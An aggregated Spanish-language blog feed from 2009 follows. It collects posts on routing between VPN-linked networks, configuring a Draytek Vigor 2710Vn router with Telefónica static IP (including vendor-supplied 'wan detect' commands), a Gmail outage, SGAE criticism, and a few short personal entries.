Ahora para poder interactuar entre los distintos ordenadores de la red, será preciso crear las rutas pertinentes en los servidores y estaciones de trabajo con las que tenemos que interactuar.

Para los equipos de la red 192.168.2.0/24 tenemos que definir esto:

# route add -net 192.168.1.0 netmask 255.255.255.0 gateway 192.168.2.1

y para los equipos que tenemos en la red 192.168.1.0/24 esto:

# route add -net 192.168.2.0 netmask 255.255.255.0 gateway 192.168.1.1

siendo el gateway el router que tiene la VPN creada.

Luego un ping entre equipos de una red y otra (con las rutas configuradas) podrán transmitirse los paquetes, o incluso conectarte por vnc o ssh a alguno de los servidores.

Blackhold: Draytek Vigor 2710Vn

noreply@blogger.com (Blackhold) — Fri, 08 May 2009 22:15:52 +0000

Pues ya tenemos otro juguetito a la colección, el tío ha tenido una entrada triunfal dando ya algunos problemas al configurarlo, por suerte ya está todo solucionado gracias a Pedro.

En la imagen mi anterior router el linksys wrt 310n y el actual draytek vigor 2710Vn.

Estamos hablando del router Draytek Vigor 2710Vn, un router super completito con soporte para wifi n y para VoIP (con una toma FXO y 2 para teléfonos analógicos o ip).

Os pego algunas de las características de este precioso cacharro con aspecto punki (¡lo que en si es!).

Built-in ADSL2/2+ modem for easy Internet access
4-port 10/100BaseT Ethernet Switch (permite crear 4 redes distintas en cada uno de los puertos LAN)
Robust Stateful Packer Inspection ( SPI ) firewall with DoS / DDoS protection to protect your network from external attacks
CSM ( Content Security Management ) for Web content access control
USB 2.0 port for network printer , FTP , and 3.5G mobile
Comprehensive VPN ( 2 VPN tunnels ) facilities provide deployment of linked branch offices and teleworkers
802.11n ( Draft-n ) Wireless LAN
Built-in VoIP facilities enable to deploy cost-effective IP telephone infrastructure (con una toma FXO y 2 tomas para teléfonos)
Multi-SIP registrar allows registration with up to six ITSPs ( Internet Telephone Service Provider )
TR-069 and 2-level management are for telcos/ISPs

Al configurar la ADSL con IP estática de telefonica me ha dado algunos problemas. En la página del router, en el apartado Internet access > MPoA (RFC1483/2684) :

Pulsar la imagen para ampliar.

Con esta configuración me encontraba que el router sincronizaba con la centralita de telefónica, recibía paquetes pero no mandaba ninguno, y aparecía la wan como bajada.

Tras preguntar en el servicio técnico han comentado esto:

Estimado Cliente:
Con respecto a su nueva consulta:
"Sincroniza correctamente pero no acepta la IP fija y no tiene conexión de Wan, con el router de operador no hay problema"
¿Que operadora y que tipo de conexión utiliza?, si es RFC-1483 de Telefónica, inserte por telnet el siguiente comando:
wan detect wan1 always_on

ó

wan detect wan1 on
wan detect wan1 target ---> dirección IP pública que siempre responda a Ping.
El equipo viene configurado por defecto con ARP detect, para detectar el estado de la WAN, pero Telefónica filtra este tipo de tráfico y el equipo no sabe cuando levantar la interface.
Asegurese del estado del interface WAN con el siguiente comando:
wan detect status
La sintaxis completa de este comando es la siguiente:
wan detect : enable/disable wan1 link detection
: ping detect, sould also set target
: arp detect (default)
: disable link detect, always connected(only support static ip)

wan detect target : set the ping target wan detect ttl 1-255>:set the ping ttl value (work as trace route)
0:default=255

wan detect status : show the currest status

Un cordial saludo,

Finalmente he probado de hacer lo primero que comentan y al instante me ha aparecido la wan levantada y conectada con el ISP!

Como es normal he empezado a hacer algunas comprobaciones para verificar que la conexión estaba correctamente establecida.
He notado que la navegación de páginas web era un poco lenta, así que he empezado a revisar la configuración del router y tras desactivar el firewall de contenido (Firewall>General setup) la navegación de páginas web ha sido mucho mas rápida, además de que no me ha dado mas timeouts en el irc.

Lo curioso es que la latencia de los pings no era excesivamente alta, parecía como si algo estuviese comprobando los paquetes:

# ping www.google.com
64 bytes from ww-in-f147.google.com (209.85.229.147): icmp_seq=4 ttl=240 time=77.2 ms
64 bytes from ww-in-f147.google.com (209.85.229.147): icmp_seq=5 ttl=240 time=81.9 ms
64 bytes from ww-in-f147.google.com (209.85.229.147): icmp_seq=6 ttl=240 time=80.2 ms

Tras unos minutos de conexión he podido ver en diagnostics ver a quién se le había ofrecido DHCP (DHCP Table) y quién estaba conectado, dónde lo estaba y a través de qué puertos (NAT Sessions table).

Algún día que encuentre un poco de tiempo debajo de una piedra (quizás ahora que tenemos un ERE parcial encima me encuentre muchas piedras de estas) voy a investigar el funcionamiento del VoIP (Fran, te llamaré desde ahí con el telefono rojo retro :D), el 3g (como usar el 3g como backup de la ADSL), lo que permite conectarse a otras wifis, vpn, el firewall interno y por supuesto intentar documentarlo todo, y para esto creo una etiqueta nueva :)

Blackhold: Gmail caído aka Gmail no funciona v.2009.2

noreply@blogger.com (Blackhold) — Fri, 08 May 2009 13:25:11 +0000

Gmail ha vuelto a caer otra vez, el día 24 de febrero ya tuvieron otra caída.

Qué será ahora? cuanto tiempo estaremos sin correo? las empresas que dependen de apps, podrán acceder a su correo?

Esto es lo que pasa cuando la gente tiene una dependencia de un servicio, mientras funciona perfecto, si falla da problemas y si la empresa entra en suspensión de pagos y cierra ya es un caos total.

Este es uno de los motivos/debate de que se recomienda usar estas herramientas en nuestros propios servidores y gracias al software libre esta tarea es mucho mas sencilla :)

Actualización 12:23
El servicio ya está operativo otra vez.

Yoire.com: [Blogs] La SGAE no perdona

Thu, 07 May 2009 10:25:49 +0000

Resulta triste leer cada cierto tiempo noticias que comentan hechos tan injustos como estos, relacionados de nuevo con nuestra "querida" sociedad y su impuesto:

http://www.elmundo.es/elmundo/2009/05/04/espana/1241465705.html

Una cosa es que la ley sea "ciega" y que si no la acatas entonces ya no tiene "sentido" y bla, bla, bla... pero.. que sentido tiene cuando sirve de "arma" para intimidar y aprovecharse de los demás? a quien ampara esta ley? en este caso parece que al ciudadano de a pie está claro que no, independientemente de si la accion es justa o no.

Aatados de pies y manos como siempre... lo único que queda es quejarse e informar...

Blackhold: antagonismos

noreply@blogger.com (Blackhold) — Thu, 07 May 2009 01:04:28 +0000

perder el móvil es la cosa mas absurda que existe
es el antagónico a perder una aguja en un pajar.

Yoire.com: [Blogs] [Video] We didn't start the flame war

Wed, 06 May 2009 19:10:36 +0000

Curradete video sobre los flames y demas

Ver en pantalla completa